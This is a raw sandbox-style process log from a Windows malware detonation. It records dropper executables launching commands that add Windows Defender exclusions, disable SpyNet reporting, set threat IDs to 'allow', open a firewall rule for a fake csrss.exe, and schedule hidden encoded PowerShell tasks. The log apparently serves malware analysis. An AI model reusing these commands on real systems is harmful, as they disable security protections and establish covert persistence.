"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Pictures\8CLOmIiMrlPxKA256rlqHgAu.exe
"C:\Users\Admin\Pictures\8CLOmIiMrlPxKA256rlqHgAu.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4988 -ip 4988
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4988 -s 872
C:\Users\Admin\AppData\Local\Temp\u1ag.0.exe
"C:\Users\Admin\AppData\Local\Temp\u1ag.0.exe"
C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe
"C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe" --silent --allusers=0
C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe
C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6f66e1a8,0x6f66e1b4,0x6f66e1c0
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LfewfClIhATqHqW1CxsJIhoA.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LfewfClIhATqHqW1CxsJIhoA.exe" --version
C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe
"C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1308 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240328125931" --session-guid=e2d223d4-5c1c-42e9-b90e-18b38193d849 --server-tracking-blob=OWJmNTFiYTI0NWJlZWIzYzQyYzI4NDFhOGQxZDdlYmE1ZjQyNTM2NTIxMTdkNjc5ZjJiMzA2MDhkOTFiYTQ2MTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N180NTYiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMCIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTE2MzA3NjYuOTA1MSIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N180NTYiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6IjM1MTBlNjg0LWE0Y2ItNDU0NC05ODkxLWE2MjI2OTFkNjc1ZiJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=3C05000000000000
C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe
C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6e04e1a8,0x6e04e1b4,0x6e04e1c0
C:\Users\Admin\AppData\Local\Temp\u1ag.1.exe
"C:\Users\Admin\AppData\Local\Temp\u1ag.1.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1672 -ip 1672
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1672 -s 1556
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Users\Admin\Pictures\9As7Ub276Pn8UYWeX7WAnwst.exe
"C:\Users\Admin\Pictures\9As7Ub276Pn8UYWeX7WAnwst.exe"
C:\Users\Admin\Pictures\5TVfzHVntQFq0XimVhZ7m8WF.exe
"C:\Users\Admin\Pictures\5TVfzHVntQFq0XimVhZ7m8WF.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4812 -ip 4812
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4812 -s 632
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4812 -ip 4812
C:\Users\Admin\AppData\Local\Temp\7zS6EB3.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS6F3F.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS8AD6.tmp\Install.exe
.\Install.exe /WZFcdidyRl "385118" /S
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4812 -s 644
C:\Users\Admin\AppData\Local\Temp\7zSA38E.tmp\Install.exe
.\Install.exe /WZFcdidyRl "385118" /S
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gBsBRFkNk" /SC once /ST 10:33:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gcJakxJLt" /SC once /ST 08:15:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gcJakxJLt"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gBsBRFkNk"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\HDGDHCGCBK.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 820 -ip 820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 820 -s 3268
C:\Users\Admin\AppData\Local\Temp\HDGDHCGCBK.exe
"C:\Users\Admin\AppData\Local\Temp\HDGDHCGCBK.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\HDGDHCGCBK.exe
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\assistant_installer.exe" --version
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x5c0040,0x5c004c,0x5c0058
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gcJakxJLt"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 13:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\WoogSGn.exe\" id /Vfsite_idZiD 385118 /S" /V1 /F
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gBsBRFkNk"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 13:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\JTzAdqm.exe\" id /JDsite_idDPR 385118 /S" /V1 /F
C:\Users\Admin\Pictures\8CLOmIiMrlPxKA256rlqHgAu.exe
"C:\Users\Admin\Pictures\8CLOmIiMrlPxKA256rlqHgAu.exe"
C:\Users\Admin\Pictures\HJcsbqzHq8hiX6npx01bsD0k.exe
"C:\Users\Admin\Pictures\HJcsbqzHq8hiX6npx01bsD0k.exe"
C:\Users\Admin\Pictures\gOQS8nuAiujAwUuADEy77FZC.exe
"C:\Users\Admin\Pictures\gOQS8nuAiujAwUuADEy77FZC.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\JTzAdqm.exe
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\JTzAdqm.exe id /JDsite_idDPR 385118 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
